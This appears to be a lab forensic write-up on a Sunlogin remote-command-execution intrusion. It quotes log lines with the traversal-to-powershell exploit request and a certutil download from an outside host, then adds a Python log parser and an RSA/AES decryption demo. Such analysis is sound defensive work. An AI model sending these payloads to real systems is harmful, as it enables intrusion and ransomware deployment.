玄机 (Xuanji) Windows hands-on: 向日葵 (Sunlogin)
Right-click the Sunlogin (向日葵) entry and open its file location, go into the logs folder and copy the log files out. The audit focuses mainly on the sunlogon log file.
2024-03-26 10:15:38.534 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64076-->192.168.31.114:49724
2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076, path: /, version: HTTP/1.1
2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076,/, plugin:, session:
2024-03-26 10:16:25.570 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64246-->192.168.31.114:49724
2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:16:25.585 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64247-->192.168.31.114:49724
2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, version: HTTP/1.1
2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, plugin:check, session:dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
2024-03-26 10:17:01.060 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64284-->192.168.31.114:49724
2024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
2024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:17:01.075 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64285-->192.168.31.114:49724
2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, version: HTTP/1.1
2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, plugin:check, session:DTOAQFngEPZBDNNp5QLOYftzErN7RBCA
Reading down to the bottom of the log, we can see the attacker invoking powershell.exe through /check?cmd= to run commands (whoami, then pwd). The requests before that are preparation rather than command execution: the GET / probe and the /cgi-bin/rpc?action=verify-haras calls, which the log shows with an empty session, whereas each /check line carries the session the attacker obtained for it. The attack success time is therefore the first command execution, 2024-03-26 10:16:25.585, the timestamp of the Acceptor line for that /check request, and the same line gives the attacker IP, 192.168.31.45. One caveat: the log only records the request arriving and being routed to the check plugin, not the command's result, so success is inferred from the attacker going on to run further commands.
Looking at the attacker's download command, we can see files being fetched from 192.168.31.249 with certutil before the host is encrypted for ransom; the visible download is mypublic.pem, an RSA public key, which fits the RSA-wrapped AES scheme described below.
2024-03-26 10:32:48.426 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49433, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmypublic.pem, version: HTTP/1.1
2024-03-26 10:32:48.426 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49433,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmypublic.pem, plugin:check, session:9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP
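The triage above (attacker IP, first command execution, decoded commands, download source) can be scripted rather than read off by eye. The parser below is an added example, not code from this writeup or from Sunlogin: it runs over a constructed sample made of the Acceptor/TcpAcceptor lines quoted on this page, keeps only the lines that carry a path in the `ip:port,/path, plugin:..., session:...` form, percent-decodes the `cmd` parameter, flags the /check requests whose ping argument traverses into powershell.exe, and reports the attacker IP, the first RCE timestamp and its session, the operator's commands, and any download URLs. The regex and the `is_powershell_rce` heuristic are my own and assume the log is in chronological order.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: Acceptor/TcpAcceptor lines copied from the excerpts above.
# Only lines ending in "plugin:..., session:..." carry the path in the form this
# parser reads; the TcpAcceptor and "path: ..., version: ..." lines are skipped.
LOG = """\
2024-03-26 10:15:38.534 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64076-->192.168.31.114:49724
2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076, path: /, version: HTTP/1.1
2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076,/, plugin:, session:
2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, plugin:check, session:dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, plugin:check, session:DTOAQFngEPZBDNNp5QLOYftzErN7RBCA
2024-03-26 10:32:48.426 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49433,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmypublic.pem, plugin:check, session:9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP
"""

# Matches only the routed-request form of the Acceptor line (my regex, not Sunlogin's spec).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) - \w+ - "
    r"\[Acceptor\]\[HTTP\] new RC HTTP connection "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+),(?P<path>\S+), "
    r"plugin:(?P<plugin>[^,]*), session:(?P<session>\S*)$"
)
URL_RE = re.compile(r"https?://[^\s\"']+")


def parse_requests(log_text):
    """One dict per routed HTTP request, with the cmd parameter percent-decoded."""
    reqs = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        url = urlsplit(rec["path"])
        # parse_qs percent-decodes and turns '+' into spaces, so the encoded
        # "ping..%2F..%2Fpowershell.exe+whoami" comes back as a readable command.
        rec["route"] = url.path
        rec["cmd"] = parse_qs(url.query).get("cmd", [None])[0]
        reqs.append(rec)
    return reqs


def is_powershell_rce(rec):
    """The chain seen in this log: /check?cmd=ping../../...powershell.exe <args>,
    i.e. the ping argument traverses out of its directory into powershell.exe."""
    cmd = rec["cmd"] or ""
    return (rec["route"] == "/check"
            and cmd.startswith("ping")
            and "../" in cmd
            and "powershell.exe" in cmd.lower())


def operator_command(cmd):
    """Drop the traversal prefix: keep what follows the lowercase powershell.exe path."""
    return cmd.split("powershell.exe", 1)[1].strip()


def triage(log_text):
    """Summarise the RCE activity; assumes the log is in chronological order."""
    rce = [r for r in parse_requests(log_text) if is_powershell_rce(r)]
    first = rce[0] if rce else None
    urls = [u for r in rce for u in URL_RE.findall(r["cmd"])]
    return {
        "attacker_ips": sorted({r["ip"] for r in rce}),
        "first_rce_time": first["ts"] if first else None,
        "first_rce_session": first["session"] if first else None,
        "commands": [operator_command(r["cmd"]) for r in rce],
        "download_urls": urls,
        "download_hosts": sorted({urlsplit(u).hostname for u in urls}),
    }


if __name__ == "__main__":
    for key, value in triage(LOG).items():
        print(f"{key}: {value}")
```

Pointing `LOG` at the real sunlogon file contents gives the same summary for the full log; the verify-haras calls never pass `is_powershell_rce`, so the first reported timestamp is the first command execution rather than the session setup.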
I had no idea at all at the DEC decryption step; the WP told me that the qq.txt echoed earlier is the 玄机 group number, and you need to join the group to get the DEC decryption file, so here we just grabbed it straight from the WP. Its hash is 5ad8d202f80202f6d31e077fc9b0fc6b. First use the DEC key (the RSA private key) to RSA-decrypt the wrapped key, then use that recovered key to decrypt the AES-encrypted content that follows.
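To make the two-step order in that last sentence concrete, here is an added example (my code, not the writeup's or the challenge's): it rebuilds a minimal hybrid-encryption scheme with the Python cryptography library and then performs the recovery. Everything about the file format is assumed, since the page does not state it: RSA-2048 with OAEP/SHA-256 for the key wrap, AES-256-CBC with PKCS#7 padding for the body, and a blob laid out as wrapped key, IV, ciphertext. The real challenge file may use a different padding, mode or layout, in which case only `recover()` needs adapting. The keypair is generated locally, with the public half standing in for mypublic.pem and the private half for the key taken from the DEC file.

```python
import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives import padding as sym_padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric import padding as rsa_padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Assumed container layout (not taken from the challenge file):
#   [RSA-2048 wrapped AES-256 key, 256 bytes][AES-CBC IV, 16 bytes][AES-256-CBC body, PKCS#7 padded]
RSA_BITS = 2048
WRAPPED_LEN = RSA_BITS // 8
IV_LEN = 16
OAEP = rsa_padding.OAEP(mgf=rsa_padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)


def make_keypair():
    """Stand-in for the attacker's keypair: the public half plays the role of
    mypublic.pem, the private half the role of the key inside the DEC file."""
    priv = rsa.generate_private_key(public_exponent=65537, key_size=RSA_BITS)
    priv_pem = priv.private_bytes(serialization.Encoding.PEM,
                                  serialization.PrivateFormat.PKCS8,
                                  serialization.NoEncryption())
    pub_pem = priv.public_key().public_bytes(serialization.Encoding.PEM,
                                             serialization.PublicFormat.SubjectPublicKeyInfo)
    return priv_pem, pub_pem


def ransom_encrypt(pub_pem, plaintext):
    """Reconstructed attacker side, used only to produce test input: fresh AES-256
    key, AES-CBC under a random IV, key wrapped with the downloaded public key."""
    pub = serialization.load_pem_public_key(pub_pem)
    key, iv = os.urandom(32), os.urandom(IV_LEN)
    padder = sym_padding.PKCS7(128).padder()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    body = enc.update(padder.update(plaintext) + padder.finalize()) + enc.finalize()
    return pub.encrypt(key, OAEP) + iv + body


def recover(priv_pem, blob):
    """The two-step decryption from the writeup: RSA-unwrap the AES key with the
    private key from the DEC file, then AES-decrypt the body. A wrong private
    key or a corrupted blob raises ValueError instead of returning garbage."""
    if len(blob) < WRAPPED_LEN + IV_LEN + 16:
        raise ValueError("blob too short to hold wrapped key, IV and one AES block")
    priv = serialization.load_pem_private_key(priv_pem, password=None)
    wrapped = blob[:WRAPPED_LEN]
    iv = blob[WRAPPED_LEN:WRAPPED_LEN + IV_LEN]
    body = blob[WRAPPED_LEN + IV_LEN:]
    key = priv.decrypt(wrapped, OAEP)          # step 1: RSA-decrypt the AES key
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    unpadder = sym_padding.PKCS7(128).unpadder()
    padded = dec.update(body) + dec.finalize()  # step 2: AES-decrypt the file body
    return unpadder.update(padded) + unpadder.finalize()


SAMPLE = b"constructed sample document body, not the challenge file"


def demo():
    """Round trip: encrypt like the ransomware would, then recover with the private key."""
    priv_pem, pub_pem = make_keypair()
    return recover(priv_pem, ransom_encrypt(pub_pem, SAMPLE))


if __name__ == "__main__":
    print(demo())
```

For the real files, replace the generated private key with the one recovered from the DEC file and the blob with the encrypted file body; if the unwrap step raises ValueError, the key, the padding or the layout assumption is wrong, and the AES step should not be attempted with whatever bytes came out.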